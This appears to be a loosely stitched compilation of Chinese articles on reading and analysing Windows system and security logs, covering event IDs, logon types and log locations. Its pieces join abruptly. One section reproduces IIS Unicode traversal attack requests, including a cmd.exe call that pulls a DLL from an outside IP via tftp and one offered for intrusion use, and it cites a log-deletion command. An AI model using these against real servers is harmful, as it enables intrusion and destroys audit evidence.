Windows日志浅析
Windows系统中的系统日志查看与分析
Windows系统中的系统日志查看与分析Windows操作系统提供了一个系统日志功能,用于记录操作系统和应用程序的活动和事件。
系统日志是管理员和技术支持人员用来诊断系统问题和监视系统性能的重要工具。
本文将介绍在Windows系统中如何查看和分析系统日志。
一、查看系统日志在Windows系统中,可以通过事件查看器来查看系统日志。
以下是查看系统日志的方法:1. 打开事件查看器在Windows操作系统的开始菜单中,搜索并打开“事件查看器”。
2. 导航至系统日志在事件查看器左侧的导航栏中,展开“Windows日志”,然后选择“系统”。
3. 检查日志系统日志中列出了操作系统的各种事件和错误。
可以根据事件级别(如错误、警告、信息)和日期范围进行筛选和排序。
二、分析系统日志系统日志中的事件提供了有关系统的重要信息和警告。
以下是分析系统日志的一些常见方法:1. 查找错误和警告在系统日志中,查找错误(红色叉号)和警告(黄色感叹号)的事件。
这些事件表示可能存在的问题或潜在的系统错误。
2. 查看事件详细信息双击一个事件,以查看其详细信息。
可以获得有关事件的时间戳、源、类别和描述等信息。
此外,还可以查看事件的特定属性和数据。
3. 使用筛选器事件查看器提供了筛选器功能,可以根据关键字、事件ID和事件级别等条件来筛选事件。
这有助于快速找到与特定问题相关的事件。
4. 导出日志有时,需要将系统日志导出并共享给其他技术支持人员。
可以使用事件查看器的导出功能将日志保存为文件,供后续分析和分享。
三、常见的系统日志事件以下是一些常见的系统日志事件及其含义:1. 硬件故障事件这些事件通常与硬件设备(如磁盘驱动器、内存)有关,表示硬件故障或错误。
2. 系统错误事件这些事件表示操作系统遇到了错误或异常情况。
例如,系统崩溃、蓝屏或无响应等。
3. 应用程序错误事件这些事件与特定应用程序有关,表示应用程序遇到了错误或异常情况。
4. 安全事件安全事件包括登录失败、文件访问权限等与系统安全相关的事件。
Windows系统系统日志分析技巧解读系统错误和警告
Windows系统系统日志分析技巧解读系统错误和警告Windows操作系统是目前世界上最常用的操作系统之一,它的稳定性和可靠性备受用户赞赏。
然而,就像任何其他复杂的软件系统一样,Windows也可能出现错误和警告。
为了帮助用户追踪和解决这些问题,Windows提供了系统日志功能。
系统日志是Windows系统中的一项关键功能,记录了系统中发生的各种事件和错误。
通过分析系统日志,用户可以获得有关系统问题的详细信息,并采取相应的措施来修复错误或解决潜在问题。
在本文中,我们将介绍一些分析系统日志的技巧,以帮助用户更好地理解和解读系统错误和警告。
1. 理解系统日志的基本原理系统日志是Windows操作系统的一个核心组件,它负责记录各种事件和错误信息。
系统日志的主要分类包括应用程序、安全性、系统和安全浏览。
每个日志都包含了各自的事件类型,如错误、警告和信息。
对于系统错误和警告的分析,我们需重点关注系统日志中的系统和应用程序事件。
2. 分析系统错误事件系统错误事件是指Windows系统内部发生的严重错误,这些错误通常会导致系统的功能异常或崩溃。
在系统日志中,系统错误事件以红色或黄色的标识出来,用户可以通过以下步骤进行分析:a. 打开事件查看器运行“eventvwr.msc”命令或通过控制面板中的“管理工具”打开事件查看器。
b. 导航到系统日志在事件查看器中,选择“Windows日志”下的“系统”。
c. 过滤系统错误事件在系统日志中,使用筛选功能过滤出系统错误事件。
常见的错误事件类型包括“Kernel-Power”、“BugCheck”和“Disk”。
d. 查看错误详情单击特定错误事件并查看其详细信息,包括错误代码、描述和相关进程信息等。
e. 尝试解决方案根据错误信息,尝试采取相应的措施来解决问题。
这可能包括更新驱动程序、修复操作系统或删除冲突的软件等。
3. 解读系统警告事件系统警告事件是指Windows系统中发生的一些非致命错误或潜在问题的警告信号。
Windows日志
Windows⽇志 在计算机领域,⽇志⽂件(logfile)是⼀个记录了发⽣在运⾏中的操作系统或其他软件中的事件的⽂件,或者记录了在⽹络聊天软件的⽤户之间发送的消息。
⽇志记录(Logging)是指保存⽇志的⾏为。
最简单的做法是将⽇志写⼊单个存放⽇志的⽂件。
1、Windows⽇志应⽤程序⽇志安全⽇志系统⽇志Scheduler服务⽇志FTP⽇志WWW⽇志DNS服务器⽇志这些⽇志的种类会根据你的系统开启的服务的不同⽽有所不同,我们在系统上进⾏⼀些操作时,这些⽇志⽂件通常会记录下我们操作的⼀些相关内容,这些内容对系统安全⼯作⼈员相当有⽤。
⽐如说有⼈对系统进⾏了IPC探测,系统就会在安全⽇志⾥迅速地记下探测者探测时所⽤的IP、时间、⽤户名等,⽤FTP探测后,就会在FTP⽇志中记下IP、时间、探测所⽤的⽤户名等。
(百度百科)通过事件查看器查看(简单打开⽅法:windows+R,输⼊:eventvwr回车)通过Powershell(管理员权限)常⽤命令查看所有⽇志:Get-WinEvent查看应⽤程序⽇志:Get-WinEvent -FilterHashtable @{logname="Application";}2、Windows需要了解的⽇志及其作⽤与位置系统⽇志: 存放了Windows操作系统产⽣的信息、警告或错误。
通过查看这些信息、警告或错误,不但可以了解到某项功能配置或运⾏成功的信息,还可了解到系统的某些功能运⾏失败,或变得不稳定的原因。
安全⽇志: 存放了审核事件是否成功的信息。
通过查看这些信息,可以了解到这些安全审核结果为成功还是失败。
应⽤程序⽇志: 存放应⽤程序产⽣的信息、警告或错误。
通过查看这些信息、警告或错误,可以了解到哪些应⽤程序成功运⾏,产⽣了哪些错误或者潜在错误。
程序开发⼈员可以利⽤这些资源来改善应⽤程序。
应⽤程序⽇志、安全⽇志、系统⽇志、DNS⽇志默认位置:%systemroot%\system32\config(%systemroot%不懂可以查windows变量)安全⽇志⽂件: %systemroot%\system32\config\SecEvent.EVT系统⽇志⽂件: %systemroot%\system32\config\SysEvent.EVT应⽤程序⽇志⽂件: %systemroot%\system32\config\AppEvent.EVTDNS⽇志: %systemroot%\system32\config\DnsEvent.EVTFTP⽇志默认位置: %systemroot%\system32\logfiles\msftpsvc1\WWW⽇志默认位置: %systemroot%\system32\logfiles\w3svc1\(FTP⽇志和WWW服务⽇志,默认每天⼀个⽇志)Scheduler计划任务服务⽇志默认位置:%systemroot%\Tasks\schedlgu.txt(由于系统屏蔽的原因,只能在命令⾏下查看)FTP 和WWW服务⽇志详解:FTP⽇志和WWW⽇志默认情况,每天⽣成⼀个⽇志⽂件,包含了该⽇的⼀切记录,⽂件名通常为 ex (年份)(⽉份)(⽇期)例如: ex180226,(2018年2⽉23⽇产⽣的⽇志)这个由于对IIS并不了解还没有尝试这些位置不⼀定能找到你想要找的⽇志,可以按照下⾯的注册表中的⽇志路径去查找⽇志的位置以上⽇志在注册表⾥的键:应⽤程序⽇志、安全⽇志、系统⽇志、DNS⽇志,这些log⽂件在注册表中的HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\EventlogSchedluler服务⽇志在注册表中HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent3、windows⽇志分析在Windows⽇志中记录了很多的操作事件,为了⽅便管理,每种类型的事件都有⼀个惟⼀的编号,这就是事件ID。
windows系统日志分析
(1)unicode漏洞入侵日志记录
这个是个非常经典的漏洞了,要找这样的服务器估计得去国外慢慢找了,但是因为它的日志是最经典的一个,所以我们这里特别拿它来做个示范。
我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%\ system32\LogFiles\文件夹下,如图1所示是一个典型的Unicode漏洞入侵行为的日志记录,对于正常的Web访问,是通过80端口用 GET命令获取Web数据,但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此漏洞。如图一所示。
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll
502 –
看到了吧?记录非常详细的,系统里面那个程序在响应都记录了下来,这样我们分析入侵行为就好办了。
在此介绍移位的目的是为了充分利用Windows 2000在NTFS格式下的“安全”属性,如果不移位也无法对文件进行安全设置操作,右击移位后的“文件夹选择属性”,进入“安全”选项卡,不选择“允许将来自父系的可继承权限传播给该对象”,添加“System”组,分别给Everyone组“读取”权限,System组选择除“完全控制”和“修改”的权限。然后再将系统默认的日志文件512KB大小改为你所想要的大小,如20MB。进行了上面的设置后,直接通过Del C:\*.Evt/s/q来删除是删不掉的,相对要安全很多了。
我们配合入侵来看下这样的记录:通过下面的编码我们在入侵的时候可以查看目标机的目录文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
windows安全日志分析
window安全日志分析今日服务器遭受入侵,入侵路径回溯:被入侵服务器—>跳板机—>办公网某主机。
因此整理记录windows被入侵相关信息。
本文只研究windows安全登录相关日志,介绍三种事件类型(登录,注销,尝试登陆)。
通过此日志可查看windows主机是否通过3389远程服务爆破进入。
注:windows日志有存储大小限制,有被覆盖的可能.可修改,请自行百度。
1.1 windows日志位置我的电脑右键管理:刷选windows安全日志事件ID:4000-4700,登录相关1.2 三种登录事件详解1.2.1 事件4648(尝试登陆)事件4648描述:此事件发生在日志所在windows主机,表明日志所在windows主机尝试连接远程主机,无论连接成功与否,这里都会记录。
网络地址端口:经测试发现只有同一局域网(且同一C段)才会记录目标服务器ip端口。
1.2.2 事件4624(登陆成功)事件4624描述:表示日志所在win主机被成功连接“使用者":指明本地系统上请求登录的帐户。
这通常是一个服务(例如Server 服务)或本地进程(例如Winlogon。
exe 或Services.exe).“登录类型”:指明发生的登录种类。
最常见的类型是 2 (交互式)和3 (网络)。
(登陆类型3:例如连接共享文件,打印机等;登陆类型7:解锁;登陆类型10:例如远程桌面等参考连接:http://blog。
sina。
/s/blog_5c39a08901012uu5。
html)“新登录”:指明新登录是为哪个帐户创建的,即登录的帐户。
“网络信息”:指明远程登录请求来自哪里.“工作站名”并非总是可用,而且在某些情况下可能会留为空白.1.2.3 事件4634(注销)1.3 日志分析工具log_parser_lizard工具介绍:一个Log Parser的图形版,功能强大(可能需要安全相关依赖,我一开始安装了Log Parser) 使用参考连接: http://blog。
Windows系统中的系统日志分析方法
Windows系统中的系统日志分析方法Windows操作系统拥有强大且详细的系统日志功能,可以记录操作系统运行过程中的各种事件和错误信息。
通过分析这些系统日志,管理员可以及时发现并解决系统问题,提高系统的可靠性和性能。
本文将介绍Windows系统中的系统日志分析方法。
一、系统日志的分类系统日志主要分为三类:应用程序日志、安全日志和系统日志。
应用程序日志用来记录与特定应用程序相关的事件信息,包括应用程序的错误、警告和信息等。
安全日志记录安全审计和访问控制信息,用于监视系统的安全状况。
系统日志则记录系统组件和操作系统自身的事件信息,包括启动和关闭事件、硬件错误和系统性能等。
二、系统日志的查看1. 打开事件查看器在Windows操作系统中,可以通过“管理工具”中的“事件查看器”来查看系统日志。
也可以使用“运行”对话框中的“eventvwr.msc”命令快速打开事件查看器窗口。
2. 选择日志类型在事件查看器窗口中,左侧面板中列出了三类日志类型:“应用程序和服务日志”、“Windows日志”和“安全日志”。
根据需要,选择相应的日志类型即可查看对应的系统日志。
三、系统日志的分析1. 了解事件的级别和类别事件查看器中,每个日志条目都有一个事件级别和事件类别。
事件级别主要分为四个等级:信息(Information)、警告(Warning)、错误(Error)和严重错误(Critical)。
事件类别则根据不同的日志类型而有所不同,比如应用程序日志中的事件类别包括应用程序错误、应用程序警告和应用程序信息等。
2. 过滤和排序日志为了更好地查找和分析系统日志,可以使用事件查看器中的过滤功能。
可以按照事件级别、事件源和关键字等进行日志过滤,只显示关注的日志信息。
此外,还可以对日志进行排序,按照时间、事件级别等进行排序,便于分析和比对。
3. 解读事件描述每个日志条目包含事件描述和相关详细信息,其中会有关键字、错误码等信息。
Windows系统中的系统日志和错误报告分析
Windows系统中的系统日志和错误报告分析在Windows操作系统中,系统日志和错误报告是非常重要的工具,它们可以记录和提供有关系统运行状况的详细信息,帮助用户分析和解决各种问题。
本文将详细介绍Windows系统中的系统日志和错误报告,并解释如何分析它们以便有效地定位和解决故障。
一、系统日志系统日志是一种记录和存储系统事件的功能,它包含了系统启动、关机、硬件故障、驱动程序问题、应用程序错误等多种类型的事件。
通过查看系统日志,用户可以及时发现并解决潜在的问题,提高系统的稳定性和可靠性。
Windows系统中的系统日志分为三类:应用程序日志、安全日志和系统日志。
应用程序日志存储与应用程序相关的事件和错误信息,安全日志用于记录安全相关的事件,而系统日志则包含与操作系统本身有关的事件和错误。
要查看系统日志,用户可以按下Win键+R键,打开运行对话框,输入eventvwr.msc命令,然后在事件查看器中选择相应的日志类型。
通过筛选和查找功能,用户可以根据日志的事件ID、级别和来源等信息找到特定的日志记录。
二、错误报告错误报告是一种Windows系统自动生成的记录故障信息的工具,它可以收集有关应用程序和系统崩溃的详细数据,并发送给Microsoft进行分析和提供解决方案。
错误报告能够帮助用户追踪和解决应用程序或系统崩溃的原因。
当应用程序或系统崩溃时,Windows系统会自动弹出错误报告对话框,用户可以选择发送错误报告给Microsoft或不发送。
如果用户选择发送错误报告,相关的错误信息将被记录并匿名上传,用于改进Windows系统的稳定性和性能。
用户也可以主动查看错误报告,方法是打开控制面板并选择“问题报告和解决”选项。
在问题报告和解决窗口中,用户可以查看已发送的错误报告以及与之相关的解决方案。
三、系统日志和错误报告的分析系统日志和错误报告的分析是解决Windows系统问题的重要步骤。
通过仔细分析日志和错误报告,用户可以找到问题的源头,并采取相应的措施进行修复或优化。
Windows系统日志分析技巧
Windows系统日志分析技巧Windows系统日志是操作系统记录各种事件的重要记录工具,通过分析系统日志可以帮助我们了解系统运行状况、排查问题和改善系统性能。
本文将介绍一些Windows系统日志分析的常用技巧,帮助读者更好地利用系统日志。
1. 概述Windows系统日志主要包含应用程序日志、安全日志、系统日志和事件订阅日志。
应用程序日志包含了与特定应用程序相关的事件和错误信息;安全日志用于记录系统登录、访问权限和安全策略相关的事件;系统日志则包含操作系统本身的事件和错误信息;事件订阅日志用于跟踪订阅发布的事件。
2. 了解日志分类在进行系统日志分析前,我们首先要对系统日志的分类有所了解。
通过观察应用程序日志、安全日志、系统日志和事件订阅日志中的事件类型和级别,可以帮助我们聚焦于特定类型的问题。
比如,如果我们遇到了系统崩溃的问题,就应该重点关注系统日志中的错误、警告和关键事件。
3. 使用筛选器Windows系统日志通常会记录大量的事件,为了快速找到我们关心的信息,可以使用筛选器进行过滤。
通过对关键词、事件ID、级别等进行筛选,可以缩小日志内容范围,提高效率。
例如,我们可以使用关键词筛选器查找特定应用程序的错误事件,或者使用级别筛选器查找系统崩溃事件。
4. 分析日志详情系统日志中每个事件都包含详细的信息,我们可以仔细阅读事件的详细描述,以了解事件发生的上下文和影响。
比如,安全日志中的登录事件可以告诉我们登录的用户名、登录类型和登录时间等信息,这些信息对于安全审计和追踪非法登录行为非常重要。
5. 应用统计功能Windows系统日志还提供了一些统计功能,帮助我们更好地了解系统的运行情况。
比如,我们可以使用性能监视器对系统日志进行实时监控,以便快速发现系统资源占用过高或者进程崩溃的问题。
此外,系统还提供了事件查看器和追踪日志等工具,用于高级日志分析和故障排除。
6. 日志备份和归档为了确保日志的完整性和长期保存,我们应该定期备份和归档系统日志。
Windows登录类型及安全日志解析
一、Windows登录类型如果你留意Windows系统的安全日志,在那些事件描述中你将会发现里面的“登录类型”并非全部相同,难道除了在键盘上进行交互式登录(登录类型1)之外还有其它类型吗?不错,Windows为了让你从日志中获得更多有价值的信息,它细分了很多种登录类型,以便让你区分登录者到底是从本地登录,还是从网络登录,以及其它更多的登录方式。
因为了解了这些登录方式,将有助于你从事件日志中发现可疑的黑客行为,并能够判断其攻击方式。
下面我们就来详细地看看Windows的登录类型。
登录类型2:交互式登录(Interactive)这应该是你最先想到的登录方式吧,所谓交互式登录就是指用户在计算机的控制台上进行的登录,也就是在本地键盘上进行的登录,但不要忘记通过KVM登录仍然属于交互式登录,虽然它是基于网络的。
登录类型3:网络(Network)当你从网络的上访问一台计算机时在大多数情况下Windows记为类型3,最常见的情况就是连接到共享文件夹或者共享打印机时。
另外大多数情况下通过网络登录IIS时也被记为这种类型,但基本验证方式的IIS登录是个例外,它将被记为类型8,下面将讲述。
登录类型4:批处理(Batch)当Windows运行一个计划任务时,“计划任务服务”将为这个任务首先创建一个新的登录会话以便它能在此计划任务所配置的用户账户下运行,当这种登录出现时,Windows在日志中记为类型4,对于其它类型的工作任务系统,依赖于它的设计,也可以在开始工作时产生类型4的登录事件,类型4登录通常表明某计划任务启动,但也可能是一个恶意用户通过计划任务来猜测用户密码,这种尝试将产生一个类型4的登录失败事件,但是这种失败登录也可能是由于计划任务的用户密码没能同步更改造成的,比如用户密码更改了,而忘记了在计划任务中进行更改。
登录类型5:服务(Service)与计划任务类似,每种服务都被配置在某个特定的用户账户下运行,当一个服务开始时,W indows首先为这个特定的用户创建一个登录会话,这将被记为类型5,失败的类型5通常表明用户的密码已变而这里没得到更新,当然这也可能是由恶意用户的密码猜测引起的,但是这种可能性比较小,因为创建一个新的服务或编辑一个已存在的服务默认情况下都要求是管理员或serversoperators身份,而这种身份的恶意用户,已经有足够的能力来干他的坏事了,已经用不着费力来猜测服务密码了。
Windows系统系统日志分析方法
Windows系统系统日志分析方法Windows操作系统是目前最为广泛使用的操作系统之一,其具备强大的系统日志记录功能。
系统日志可以帮助我们了解系统的运行状态,检测和解决潜在的问题。
本文将介绍一些Windows系统系统日志的基本概念和分析方法,帮助读者更好地理解和利用系统日志。
一、Windows系统日志概述Windows系统日志是操作系统内置的日志记录器,用于记录系统和应用程序的事件和错误信息。
系统日志能够记录各种类型的事件,如系统启动、关机、硬件和驱动程序的错误、应用程序的错误等。
通过对系统日志的分析,可以快速定位问题,并采取相应的措施。
二、系统日志的分类Windows系统日志主要分为以下几类:1. 应用程序日志:记录与安装的应用程序相关的事件和错误信息,如应用程序崩溃、配置文件损坏等。
2. 安全日志:记录与系统安全相关的事件和错误信息,如登录、访问权限管理等。
3. 系统日志:记录与系统运行状态相关的事件和错误信息,如硬件故障、服务启动和停止等。
4. 设置日志:记录与系统设置相关的事件和错误信息,如时间、日期和网络设置等。
三、系统日志的查看和分析方法Windows系统提供了多种方法来查看和分析系统日志,以下是一些常用的方法:1. 使用事件查看器:事件查看器是Windows系统内置的日志查看工具,可以通过“开始”菜单 -> “管理工具” -> “事件查看器”来打开。
在事件查看器中,可以选择具体的日志分类,查看日志的详细内容和属性。
2. 使用命令行工具:Windows系统提供了一些命令行工具来查看和分析系统日志,如“eventquery.vbs”和“wevtutil.exe”。
通过命令行工具,可以灵活地筛选和分析系统日志,以满足特定的需求。
3. 使用第三方工具:除了操作系统自带的工具,还有许多第三方工具可以帮助我们更好地查看和分析系统日志。
这些工具通常提供更加友好的界面和功能,可以更方便地进行日志的筛选、搜索和导出等操作。
Windows系统日志取证分析简述
• 21•计算机犯罪现象越来越多,预防与遏制它们成为当前社会的技术难题,任何人在计算机中的操作都会在日志文件中留下痕迹。
日志文件种类很多,需要关注各种类型的日志文件进行合并取证分析。
首先介绍了Windows 日志,包括系统日志、安全日志、应用程序日志,然后说明了Windows 日志中事件类型,然后从web 日志的分析入手,剖析不同的日志文件我们分析时所要注意的重点内容。
日志分析对计算机取证有重要作用。
某一个日志会记录它所在系统或应用程序的各种信息。
在进行计算机取证分析时,我们要全面的分析多个日志文件,如果仅对单一日志文件分析那么我们可能会漏掉许多信息。
我们需要做的就是把所有获取的日志文件进行比对、整合、关联使得他们能够为我们形成一个较为完整的犯罪场景,为我们的进一步工作提供支持。
1 日志1.1 日志的概念日志(Log)起源于航海日志。
航海日志就是我们航海归来之后我们可以对在海上的工作进行分析,总的来说就是一个海上的日记。
日志(Log)表示在时间上连续地设置有由系统指定的对象的动作及其动作结果。
为了保持计算机系统资源的运行状态,系统会将任何活动和在操作中出现的一系列情况进行详细记录,并保存它们。
这些信息对于电脑犯罪取证人员来说是非常有用的。
1.2 Windows日志日志文件不同于我们系统中的其他文件,它有着不一样的用处与作用。
目前计算机中使用最多的Windows 操作系统,如今越来越多的Windows 操作系统日志以二进制形式保存,他们有着自己的存储方式,就是循环覆盖缓存。
它们记录了用户在系统里面完成了什么操作,还有做出了什么样的错误指令以及其他的一些记录。
我们通过查看系统的这些文件,不仅可以回看用户正确操作,同时也可以去搜索那些的错误操作以及不是系统用户本人做出的操作。
因此,无论是系统管理者还是黑客,都非常重视这些文件。
管理员可以通过这些文件查看系统的安全状态,并且找到入侵者的IP 地址或各种入侵证据。
电脑系统日志的查看与分析
电脑系统日志的查看与分析在我们日常使用电脑的过程中,电脑系统会默默地记录下各种操作和事件,这些记录被称为系统日志。
系统日志就像是电脑的“日记”,它详细地记载了电脑运行的点点滴滴。
通过查看和分析系统日志,我们可以了解电脑的运行状况、发现潜在的问题,并采取相应的措施来解决它们。
接下来,让我们一起深入了解电脑系统日志的查看与分析。
一、什么是电脑系统日志电脑系统日志是一个记录系统活动和事件的文件或数据库。
它包含了关于操作系统、应用程序、硬件设备以及用户操作等方面的信息。
系统日志的类型多种多样,常见的有系统日志、应用程序日志、安全日志等。
系统日志通常记录了系统的启动和关闭时间、系统错误和警告信息、硬件设备的连接和断开情况等。
应用程序日志则记录了特定应用程序的运行情况,如软件的安装、更新、错误和异常等。
安全日志主要关注与系统安全相关的事件,如用户登录和注销、权限更改、文件访问等。
二、为什么要查看和分析系统日志1、故障排查当电脑出现故障或异常时,系统日志可以提供重要的线索。
例如,如果电脑频繁死机或蓝屏,通过查看系统日志中的错误代码和相关信息,我们可以初步判断问题的所在,是硬件故障、驱动程序问题还是系统文件损坏等。
2、安全监控系统日志可以帮助我们监测是否有未经授权的访问、恶意软件的活动或其他安全威胁。
通过分析安全日志中的登录记录和权限更改信息,我们可以及时发现异常情况并采取措施加以防范。
3、性能优化了解系统的资源使用情况和性能瓶颈对于优化电脑性能至关重要。
系统日志可以提供有关 CPU 使用率、内存占用、磁盘 I/O 等方面的信息,帮助我们找出性能不佳的原因,并进行相应的调整和优化。
4、合规性要求在一些企业和组织中,出于合规性的要求,需要对电脑系统的活动进行记录和审计。
系统日志可以作为证据,证明系统的操作符合相关的法规和政策。
三、如何查看电脑系统日志不同的操作系统查看系统日志的方法略有不同。
以下是常见操作系统的查看方法:1、 Windows 系统在 Windows 系统中,我们可以通过以下步骤查看系统日志:(1)按下“Win +R”组合键,打开“运行”对话框,输入“eventvwrmsc”并回车。
windows系统日志分析
2. 设置文件访问权限
修改了日志文件的存放目录后,日志还是可以被清空的,下面通过修改日志文件访问权限,防止这种事情发生,前提是Windows系统要采用NTFS文件系统格式。
右键点击D盘的CCE目录,选择“属性”,切换到“安全”标签页后,首先取消“允许将来自父系的可继承权限传播给该对象”选项勾选。接着在账号列表框中选中“Everyone”账号,只给它赋予“读取”权限;然后点击“添加”按钮,将“System”账号添加到账号列表框中,赋予除“完全控制”和“修改”以外的所有权限,最后点击“确定”按钮。这样当用户清除Windows日志时,就会弹出错误对话框。
二、Windows日志实例分析
在Windows日志中记录了很多操作事件,为了方便用户对它们的管理,每种类型的事件都赋予了一个惟一的编号,这就是事件ID。
1. 查看正常开关机记录
在Windows系统中,我们可以通过事件查看器的系统日志查看计算机的开、关机记录,这是因为日志服务会随计算机一起启动或关闭,并在日志留下记录。这里我们要介绍两个事件ID“6006和6005”。6005表示事件日志服务已启动,如果在事件查看器中发现某日的事件ID号为6005的事件,就说明在这天正常启动了Windows系统。6006表示事件日志服务已停止,如果没有在事件查看器中发现某日的事件ID号为6006的事件,就表示计算机在这天没有正常关机,可能是因为系统原因或者直接切断电源导致没有执行正常的关机操作。
笔者以应用程序日志为例,将其转移到“d:\cce”目录下。选中Application子项(如图),在右栏中找到File键,其键值为应用程序日志文件的路径“%SystemRoot%system32configAppEvent.Evt”,将它修改为“d:cceAppEvent.Evt”。接着在D盘新建“CCE”目录,将“AppEvent.Evt”拷贝到该目录下,重新启动系统,完成应用程序日志文件存放目录的修改。其它类型日志文件路径修改方法相同,只是在不同的子项下操作,或建立一系列深目录以存放新日志文件,如D:\01\02\03\04\05\06\07,起名的原则就是要“越不起眼,越好”。
Windows事件日志简要解析
Windows事件日志简要解析简介:Windows系统内置三个核心日志文件:System、Security、Application,默认大小均为20480kB也就是20MB,记录数据超过20MB时会覆盖过期的日志记录;其他的应用程序以及服务日志默认大小均为1MB,超过这个大小一样的处理方法。
日志类型:事件类型注释信息(Information)指应用程序、驱动程序、或服务的成功操作事件警告(Warning)警告事件不是直接的、主要的,但是会导致将来问题的发生错误(Error)指用户应该知晓的重要问题成功审核(Success Audit)主要指安全性日志,记录用户的登录/注销、对象访问、特权使用、账户管理、策略更改、详细跟踪、目录服务访问、账户登录事件失败审核(FailureAudit)失败的审核安全登录尝试事件日志文件类型:类别类型描述文件名Windows 日志系统包含系统进程,设备磁盘活动等。
事件记录了设备驱动无法正常启动或停止,硬件失败,重复IP地址,系统进程的启动,停止及暂停等行为。
System.evtxWindows 日志安全包含安全性相关的事件,如用户权限变更,登录及注销,文件及文件夹访问,打印等信息。
Security.evtxWindows 日志应用程序包含操作系统安装的应用程序软件相关的事件。
事件包括了错误、警告及任何应用程序需要报告的信息,应用程序开发人员可以决定记录哪些信息。
Application.evtx应用程序及服务日志Microsoft Microsoft文件夹下包含了200多个微软内置的事件日志分类,只有部分类型默认启用记录功能,如远程桌面客户端连接、无详见日志存储目录对应文件类别类型描述文件名线网络、有线网路、设备安装等相关日志。
应用程序及服务日志MicrosoftOfficeAlters微软Office应用程序(包括Word/Excel/PowerPoint等)的各种警告信息,其中包含用户对文档操作过程中出现的各种行为,记录有文件名、路径等信息。
Windows系统错误日志分析
Windows系统错误日志分析Windows系统错误日志是一种记录操作系统发生错误和异常情况的功能,它能够帮助用户定位和解决问题。
在本文中,我们将介绍如何分析Windows系统错误日志以及如何解决常见的错误问题。
1. 错误日志的获取为了能够分析Windows系统错误日志,我们首先需要获取它。
在Windows操作系统中,可以通过以下步骤获取错误日志:1. 打开“事件查看器”:在开始菜单中的搜索栏中输入“事件查看器”,并点击打开该程序。
2. 导航到“Windows日志”下的“应用程序”:在事件查看器的左侧面板中,展开“Windows日志”,然后单击“应用程序”。
3. 查看错误日志:在右侧的面板中,将显示一系列的事件,包括错误、警告和信息。
我们需要关注错误事件,这些事件通常会以错误代码或错误消息的形式显示。
2. 错误日志的分析一旦我们获取了Windows系统错误日志,就可以开始分析它们了。
下面是一些常见的错误类型及其分析方法:2.1 应用程序错误应用程序错误通常表示在运行某个应用程序时出现了问题。
我们可以根据错误日志中的应用程序名称和错误代码来定位问题。
常见的解决方法包括:- 更新应用程序:某些错误可能是由于应用程序的旧版本或错误配置导致的。
尝试更新应用程序到最新版本或重新配置应用程序的设置。
- 修复或重新安装应用程序:如果问题仍然存在,可以尝试修复或重新安装应用程序,以确保相关文件和设置正确。
2.2 系统错误系统错误通常表示操作系统本身遇到了问题。
我们可以根据错误日志中的错误代码和错误消息来解决问题。
常见的解决方法包括:- 更新操作系统:某些系统错误可能是由于操作系统的错误或漏洞导致的。
通过Windows更新功能,确保操作系统安装了最新的补丁和更新程序,以修复已知的问题。
- 执行系统维护工具:Windows系统提供了一些维护工具,如磁盘清理和错误检查工具。
我们可以尝试运行这些工具来修复系统错误。
- 查找支持文档或联系技术支持:如果问题仍然存在,我们可以查找操作系统的支持文档或联系相关的技术支持人员,以获取更多的帮助和解决方案。
windows系统日志分析
Windows系统日志分析简介Windows系统日志是操作系统记录和存储系统活动的重要组成部分。
通过分析Windows系统日志,可以帮助管理员和分析师监控系统的运行状况,检测并处理潜在的问题。
本文将介绍Windows系统日志的基本概念和常见分类,并提供一些常用的日志分析工具和技术。
Windows系统日志分类Windows系统日志主要包括以下几类:1.应用程序日志(Application log):记录应用程序的运行情况,如程序崩溃、错误信息等。
2.安全日志(Security log):记录系统的安全事件和用户访问情况,如登录、权限变更等。
3.系统日志(System log):记录系统的运行状态和错误信息,如蓝屏、服务启停等。
4.设备管理日志(Device management log):记录设备的管理操作和状态,如驱动安装、硬件故障等。
日志分析工具下面列举了一些常用的Windows系统日志分析工具:1.Event Viewer:Windows自带的系统日志查看工具,可查看和分析本地和远程计算机的日志。
2.Microsoft Message Analyzer:一款强大的网络分析工具,可以对日志文件进行分析和解析,帮助排查网络问题。
3.Splunk:一款主流的日志分析平台,支持实时数据分析和可视化展示,并提供各种插件和API接口,便于与其他工具集成。
4.ELK Stack:由Elasticsearch、Logstash和Kibana三个开源组件组成的日志管理和分析平台,可实现海量数据的存储、搜索和可视化分析。
日志分析技术在进行Windows系统日志分析时,可以采用以下一些常用的技术:1.关键字搜索:根据关键字对日志进行搜索,可以快速定位相关信息。
例如,搜索关键字。
Windows日志浅析
Windows⽇志浅析Windows⽇志浅析(转载)⼀、概述Windows⽇志从Windows2000版本后共包括9种审计策略,Windows NT只有7种共分为:帐户登录、登录、对象访问、⽬录服务访问、进程追踪、特权使⽤、帐户管理、策略变更、系统事件9⼤类。
其中帐户登录其实是对登录⽤户的认证事件,据⼤神Randy⾃⼰说,称其为“认证事件“更为合适。
登录事件记录的是⽤户登录到哪台PC的事件。
对象访问记录的是⽤户对Windows对象的访问事件,这⾥对象包括注册表、服务、打印机、⽂件/⽂件夹等。
⽬录服务访问就是对AD中所有对象的访问事件。
进程追踪则为主机执⾏的程序事件,不管是由⽤户⾃⼰执⾏还是系统⾃动执⾏的。
特权使⽤指⽤户使⽤分配的特权的事件,这⾥特权指在本地安全策略中分配给⽤户的权限。
帐户管理则包含了本地帐户、⽤户组、DC中域⽤户、域⽤户组等对象的管理、密码设置等事件。
策略变更指本地安全策略或DC上信任关系变化的事件。
系统事件则涉及到⼀些安全事件的杂项,如系统的启动和关闭、系统事件修改等等。
每个windows⽇志都由两部分组成:头字段和描述字段。
头字段是相对内容和格式都固定的部分,包括的信息有:事件的id、⽇期和时间、事件的结果(成功还是失败)、事件的来源和类别。
由于安全⽇志所有的来源都记为“source”,因此意义不⼤。
⽽类别就是(⼀)中提到的9种类别。
这⾥的⽤户字段⽤处也不是很⼤,因为很多事件简单地记为“STSTEM”为⽤户,所以真正要看是什么⽤户触发了该条⽇志还是要看描述字段⾥⾯是否有相应的实际⽤户(这些在随后的⽇志分析中会涉及到)。
